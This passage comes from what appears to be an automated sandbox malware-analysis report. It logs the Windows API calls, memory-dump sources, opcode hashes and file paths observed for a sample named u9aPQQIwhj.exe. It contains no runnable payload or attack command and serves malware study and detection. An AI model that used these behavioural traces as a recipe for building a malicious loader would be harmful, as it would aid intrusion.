                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: PathSearch
                                                  • String ID:
                                                  • API String ID: 2203818243-0
                                                  • Opcode ID: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
                                                  • Instruction ID: d23dd041866cef5afdca28ea12ef8b7a62ea4ba21799db9ef353d819d1220e11
                                                  • Opcode Fuzzy Hash: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
                                                  • Instruction Fuzzy Hash: 55E048B1314100AAD710DF65DD48EAA7768DB01368F304576F211B61D1D2B469419729
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                  • Instruction ID: e3df8b11752b843856ad965a2913e8001498b25c252565f1a48e325e263545e5
                                                  • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                  • Instruction Fuzzy Hash: 88E04F76280108BADB00DFA4ED46E9577ECEB14701F004425B608D6091C674E5008768
                                                  APIs
                                                  • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                  • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
                                                  • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                  • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                  • Instruction ID: 4a9ded8e7257bdb173b40b31e6f72bab7f1256b0bf9ca600b2aeebe95f436f9e
                                                  • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                  • Instruction Fuzzy Hash: CFF09BF19097A0DEF350DF688C847063BE4E3983C4B03852AE3A8E6268EB344048CF19
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
                                                  • Instruction ID: 6bbe31101158ed697117799215e52ff0bd2f9d85eb69b818a49c661f2cf41376
                                                  • Opcode Fuzzy Hash: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
                                                  • Instruction Fuzzy Hash: BCE08630841204BBDB00AFA0CD49DEE3B78EF11340F10443AF540BB0D1E7F89580975A
                                                  APIs
                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                  • Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
                                                  • Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                  • Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                  • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                  • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                  • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                  • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                  • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                  • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                  • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
                                                  • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                  • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69
                                                  APIs
                                                  • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
                                                  • Instruction ID: 218267b357b67079b54de8dffa8c027c75f66e7c1ef01c1e874d3fe206bc0dcd
                                                  • Opcode Fuzzy Hash: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
                                                  • Instruction Fuzzy Hash: A3D0C9B7B181009BE750EFB9AE8985B73A8E7513297604C73D942F20A1D578D8028A79
                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,?), ref: 10001225
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                  • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                  • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                  • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B31
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                                                  • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                                                  • DeleteObject.GDI32(00000000), ref: 00404C04
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                                                  • ShowWindow.USER32(?,00000005), ref: 00404D5E
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                                                  • GlobalFree.KERNEL32(?), ref: 00404F3E
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                                                  • InvalidateRect.USER32(?,00000000,?), ref: 0040508F
                                                  • ShowWindow.USER32(?,00000000), ref: 004050DD
                                                  • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                                                  • ShowWindow.USER32(00000000), ref: 004050EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
                                                  • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                                                  • Opcode Fuzzy Hash: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
                                                  • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404617
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404641
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                                                  • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 0040472F
                                                  • lstrcatW.KERNEL32(?,Call), ref: 0040473B
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                                                    • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061DF
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061F3
                                                    • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00406206
                                                  • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                                                  • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                  • String ID: A$C:\Users\user\Uploadable\normallnnens$Call
                                                  • API String ID: 2246997448-1071425816
                                                  • Opcode ID: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
                                                  • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                                                  • Opcode Fuzzy Hash: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
                                                  • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                                                  APIs
                                                  • CoCreateInstance.OLE32(00407474,?,?,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                  Strings
                                                  • C:\Users\user\Uploadable\normallnnens\Trskelen, xrefs: 004020F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\Uploadable\normallnnens\Trskelen
                                                  • API String ID: 542301482-936114887
                                                  • Opcode ID: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
                                                  • Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
